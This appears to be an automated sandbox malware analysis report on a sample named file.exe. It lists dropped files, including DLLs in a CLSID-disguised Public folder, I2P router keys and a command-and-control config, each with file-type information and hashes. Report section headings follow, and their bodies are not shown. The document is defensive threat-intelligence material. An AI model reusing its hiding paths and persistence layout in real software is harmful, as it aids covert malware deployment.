C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	7D37AB1E97BBC8593665FF365D8C96B7	B42A6717F91A4C538A4979AB1F0A9CC58485061D	1DA31243257B0EBC79BA57CA98E6A3A1996CC4E2641E96098561CDCB1FA3EE46
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log	ASCII text, with CRLF line terminators	638B8EC48130148F4AFD3662B99BE525	4EB0CD7D176B828C292BCDE1E718CBF6AE4A3C87	D3C16814F9073BDED811390D36E65253F4A0C2B8D5F754D740FC6B3E411FD392
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	FB3BDB27D9C479148F3545ED99E65980	A5860563DE81D8B74A1C842647E8F4AC7655842A	2B5DC45E89700D4B991ADDED1AA097641D60932B7BBE2C12FC8536B9D46F15A6
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log	ASCII text, with CRLF line terminators	2F0D252B3BD8874B2EAA1E869AEBB844	7F8BC6C4AB57366A85026B178A03EC7961297E54	E96999C5F6EE64996D61574635216C96357F65C51282F354872DF321B8EAC77D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf	ASCII text, with CRLF line terminators	1256DA672B8F39A275FE17E6C716F822	B156C2186056CC5BFCA84549DD53F796936B2F6D	44DC1F938213E09A6EF6A64A9F14804530AE53F41E71813EFAF651D9516E246E
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3	data	166C6727028BD4F428E411ED225117C6	D08CB3E69EA6CF633349F990229E87CBA4BCD72A	63A0993B931DAD9DCCF08EA48A0D8E8BA94652EDA5BC84F787E640CDD0FC800A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\5spuxvtyp6bpzxqbodiqxcfongbbqlsamj3w6d54pocgrixn5wfa.dat	data	4C6917D19D88CD15080E4226060AA718	0D725713EB35ADF7DE25152924320B2854E0C52F	6E8F3D7BF26C45A604BA89E78F205334A8D4CCA7D98F541B368315157CE5039F
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\i2p.log	ASCII text, with CRLF line terminators	5D7E337DEF47D754D775D2BD721725A9	C5151D32AFD3A6A6E88AAF6882783E7050BB17D9	D2036A9B1D06B3A200D196EC4FAE19ED0B0D5C65852DE97B27C8C5CA716D30DE
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys	data	64C4BA98F0025148B487CE1087FB5C34	884E28F61DD76CDA0B30782EA9759EF53F519663	0357F5F3EE7A5159CD36ABF264DF663385133C9C686AEF4FE2DF9F3114ED0A8D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info	data	B249C4AD690C26B34AF4184DA0C0E237	5992AE6E0A7A8CC1AF6589B4E22F06666E9EFD2A	4E5BD681F5ED641BD7ECE4AA87CD7ED3EC885500FF2104C3A35084593EA91CC3
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys	data	85F058B0EA3E8BA7301731F23C4C25C0	B16784EC481615B49F4EE24CB2F6E6A0F85961AA	57DAA0E57D18230C0256DEF527027CC1399E44F8BBD413C86EED028BCDBA660E
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys	OpenPGP Public Key	840B0503053704A53674330C18E942DB	8D453C9477A4025306C26907F6EFE70EC408EBDF	D56033E8A4B6822EB26D757DD7E48CC27D1D7CD7E70EC500D12368A81CC9315D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows	FE7ED803A7F672FAEE4587732B2C6E0F	DF209D1B055044ABF4C0A6D4DE3EBFCD8D7784E1	154C3DCA584BB1F78C7AE7688D70998F2B62BED8884267E3FCF150BFEFE2C9D8
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	CFCBC15615FFC698507D32C0A7D21134	F6DACCE59F78CA4EE6622C4A340923282EC3ADDE	A653F5DBEB0DDECBC16C70B0B8C9471ABB30C66032C2EE951DC36265F899D7D8
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log	ASCII text, with CRLF line terminators	CE2C6B8F841C96D0ADC8A0E256B2EAC7	1656C75F564A10BA10E5C910C9E09129D39BFE6D	514A2F37395C3D898421EAB3D1D69B682A9F72794775550BA3E50BB7913EE99E
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	B85FECC5E81D0CFBC3750C06E4A11412	0F57603DB18BFE0A5EE50D618184E9ED4FCAFD7F	9FD76374C6E19923F99411D6F9BBF6614C94D81CD47630314C2AE21A94DF40A8
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log	ASCII text, with CRLF line terminators	1D78379C58A1A7EE18742F3FE00DF724	140B9711E37007F22CB3EC2FE4A4E4FDA6287D81	06FEDAE4D60D1E974E6DB6F9CA58A83E3AB9BD632C6D0181334B8EA943709EAC
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	FEF8651F5F797F30A37D7CD36BEA31AC	8E85D22FB5247A69C1298D703D629DD46BC44C74	4083F67D11E7DF827BFF6C665B29F39FB197B4BA608D5C39ECFF46EA9A0B61F0
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log	ASCII text, with CRLF line terminators	47CD67892A3C01B6667CBD787DD4A847	67671FF305B5E22DF4A7D9960118BAF79C234456	A70AE63D82FE06F7412250902C1A0126742D3E569E93D3C39BE171B2F48A3787
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	E3E4492E2C871F65B5CEA8F1A14164E2	81D4AD81A92177C2116C5589609A9A08A5CCD0F2	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	D44FBD8760E79F5D950DB5BC6E86A398	2175264673A9A5B7AF024D8E8F28879B1758ABC8	AD38977D88E19C24793C6AEE42B6389536B6879FAA50E2438350F140247A9DF2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log	ASCII text, with CRLF line terminators	53E814031F42314FC158208FCAD21ED0	4EECFC454AB1E52DD1E4E86021BD1A4919ED54E0	5566A5800D7065B9BA3B3BC289D507638E52358FC70DCEB720EDD19F65419EB5
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	BF5D5BA471AB0266F991095FDCF74140	42E890322966B7F2F9802C9E22269ED339C2969B	91DB57A2B77AC18B9605B08D7B926F9DC32C7E7D6F4047FBA0270A4403C288BB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini	Generic INItialization configuration [SLPolicy]	8CCA461A362EF864BDF35EDDE9F8E7A5	83E7254EAA34C130EA56965E4CF46610AAF69C8F	785639D13771B021F191EC60E1C8E3E2EFEA164D2005F297A24559AEB0F58CCF
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg	data	B19DD73939F4D3249E87008653BFE5F5	936A1DE5275E0EA2E4BC9BE7B724736B135B5BE4	7403BF80DA0910E3279FA603AE2D573B06F11D3D72585664965E593DAC92A0B6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7847438767[1].exe	PE32+ executable (GUI) x86-64, for MS Windows	E9CEBB30948E986C3C16E0C9EF8EC9F2	2F8B30106FE66B69C4920771142189A7B6C0C49E	3C96C92C11B1277B3569D21BDE04EE9B33501AEE5CB4AEA08DAC7DD41FF1845F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators	147372F4F51190F26A9E1841E697E532	2E817AECCA1C9B4EEF8323A243453541DBC0BF11	EDD36F3D067D288A274E5D552303F1BA00854B54CB78FB39F4F5805707BFCA5D
C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	1455F96A3552BFFCBD01FB90A2A4447B	A0BEB097FB0F3FD1A83EF3D01BFF8706A40B32C1	CE82112E8B4476B65B09FCCD1CFF9F2F088FE4837C9129DE3D82CAEE138E6D7C
C:\Users\user\AppData\Local\Temp\installer.log	ASCII text, with CRLF line terminators	0266C6DC6340CE09B3BE7C00F3740640	6A3D5783B719179B1945CEB27F04C1B4658655AD	E11E57BE5E9EDAA701F9C402EA9CF76C9CA4DBCE45F3836A2316D9908ABCCC3C
C:\Windows\Temp\1kuzcKGx	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	E6CAC6ACD18D0BBAD9C2384B1DBEDE84	63004A83FF18CCE911BC74D27C1A2B7BEA9CF4C3	9BC6EDD286F4DCD83E57B541BC99038F7E902DE943A6FD528BA485DF1187FFA8
C:\Windows\Temp\FHLBnhuN	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	7D37AB1E97BBC8593665FF365D8C96B7	B42A6717F91A4C538A4979AB1F0A9CC58485061D	1DA31243257B0EBC79BA57CA98E6A3A1996CC4E2641E96098561CDCB1FA3EE46
C:\Windows\Temp\K5561pLF	Generic INItialization configuration [SLPolicy]	8CCA461A362EF864BDF35EDDE9F8E7A5	83E7254EAA34C130EA56965E4CF46610AAF69C8F	785639D13771B021F191EC60E1C8E3E2EFEA164D2005F297A24559AEB0F58CCF
C:\Windows\Temp\KXEmxT2p	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows	FE7ED803A7F672FAEE4587732B2C6E0F	DF209D1B055044ABF4C0A6D4DE3EBFCD8D7784E1	154C3DCA584BB1F78C7AE7688D70998F2B62BED8884267E3FCF150BFEFE2C9D8
C:\Windows\Temp\Lx9RtFcl	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	D44FBD8760E79F5D950DB5BC6E86A398	2175264673A9A5B7AF024D8E8F28879B1758ABC8	AD38977D88E19C24793C6AEE42B6389536B6879FAA50E2438350F140247A9DF2
C:\Windows\Temp\OjI1jGmI	data	166C6727028BD4F428E411ED225117C6	D08CB3E69EA6CF633349F990229E87CBA4BCD72A	63A0993B931DAD9DCCF08EA48A0D8E8BA94652EDA5BC84F787E640CDD0FC800A
C:\Windows\Temp\QO8YpEd6	Generic INItialization configuration [cnccli]	91D86E531FECE0D34AD78D947FC7331C	52C9A7C16634637E9DB31A6CE63850DFB170B44D	A885C71096995389DF3015B194B9AD10AE24C4328F4322932D6455398B2FC653
C:\Windows\Temp\S7evpAMe	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	FB3BDB27D9C479148F3545ED99E65980	A5860563DE81D8B74A1C842647E8F4AC7655842A	2B5DC45E89700D4B991ADDED1AA097641D60932B7BBE2C12FC8536B9D46F15A6
C:\Windows\Temp\TD8r2foe	ASCII text, with CRLF line terminators	1256DA672B8F39A275FE17E6C716F822	B156C2186056CC5BFCA84549DD53F796936B2F6D	44DC1F938213E09A6EF6A64A9F14804530AE53F41E71813EFAF651D9516E246E
C:\Windows\Temp\fJw4qvYl	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	B85FECC5E81D0CFBC3750C06E4A11412	0F57603DB18BFE0A5EE50D618184E9ED4FCAFD7F	9FD76374C6E19923F99411D6F9BBF6614C94D81CD47630314C2AE21A94DF40A8
C:\Windows\Temp\feJ0dymt	PE32+ executable (DLL) (console) x86-64, for MS Windows	E3E4492E2C871F65B5CEA8F1A14164E2	81D4AD81A92177C2116C5589609A9A08A5CCD0F2	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
C:\Windows\Temp\g29qQU9G	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	BF5D5BA471AB0266F991095FDCF74140	42E890322966B7F2F9802C9E22269ED339C2969B	91DB57A2B77AC18B9605B08D7B926F9DC32C7E7D6F4047FBA0270A4403C288BB
C:\Windows\Temp\h0yu5TYE	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	FEF8651F5F797F30A37D7CD36BEA31AC	8E85D22FB5247A69C1298D703D629DD46BC44C74	4083F67D11E7DF827BFF6C665B29F39FB197B4BA608D5C39ECFF46EA9A0B61F0
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	0740B4E2D8ACE24CB15D06EDAB878C1B	77A2204222CAA848314C2BBF99D5DB8B60CA44DE	2F25233C4991568B525398A6B6F0CC7365BAF5E3EDF351455E955B0BACDD71C2

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by